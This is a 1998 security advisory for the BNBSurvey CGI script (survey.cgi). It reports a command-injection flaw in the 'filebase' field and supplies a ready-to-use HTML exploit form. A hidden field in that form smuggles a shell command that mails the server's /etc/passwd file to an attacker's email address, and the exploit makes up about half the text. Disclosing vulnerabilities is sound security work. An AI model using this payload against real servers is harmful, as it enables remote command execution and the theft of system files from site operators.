Vulnerable program: BNBSurvey (survey.cgi)
	 Platforms: UNIX
	    Impact: in certain circumstances, remote users can execute arbitrary
		    commands as the uid of the webserver 
	  Found By: duke (duke@viper.net.au - duke@el8.org)
     Advisory Made: Thursday, December 3, 1998

Information
-----------

BNBSurvey is a CGI for doing simple surveys, and is available at:
http://bignosebird.com/carchive/survey.shtml. This script has 2 modes of
operation - the first being that people can vote as many times as they like, 
and the second being that the people can only vote once every hour. The 
first operation is the default.

If this second mode of operation is enabled though, remote users can use 
metacharacters in the 'filebase' variable to execute arbitrary commands.
(ie. if $ENFORCEMENT = "1" is set in the cgi script).

Exploit
-------

The following form is a sample exploit. It must be modified to point to the 
victims cgi script. This example mails the /etc/passwd file on the server to 
you.

<HTML>
<BODY BGCOLOR="#FFFFFF">
<CENTER>
<FONT FACE="ARIAL">
<H2>The BigNoseBird.Com<BR>
    Survey Demonstration
</H2>
<HR WIDTH=450>
</CENTER>

</FONT>
  <FORM METHOD="POST" ACTION="www.victim.com/cgi-bin/survey.cgi">
  <input type=hidden name=action value="VOTE">
  <input type=hidden name=filebase value="bleh; /bin/mail you@your_email_address.com</etc/passwd; w">
<PRE>
  Your Gender
   <input type=radio name=ITEM1 value="0">Male
   <input type=radio name=ITEM1 value="1">Female
   <input type=radio name=ITEM1 value="2">Neuter

  Your Age
   <input type=radio name=ITEM2 value="0">Under 18
   <input type=radio name=ITEM2 value="1">18-35
   <input type=radio name=ITEM2 value="2">36+

  How did you find us?
   <input type=radio name=ITEM3 value="0">Search Engine
   <input type=radio name=ITEM3 value="1">Directory
   <input type=radio name=ITEM3 value="2">Link
   <input type=radio name=ITEM3 value="3">Referral
   <input type=radio name=ITEM3 value="4">Accident

 <INPUT TYPE="submit" VALUE="VOTE!"><input type="reset" value=" Clear-Form">
</PRE>
  </FORM>
 

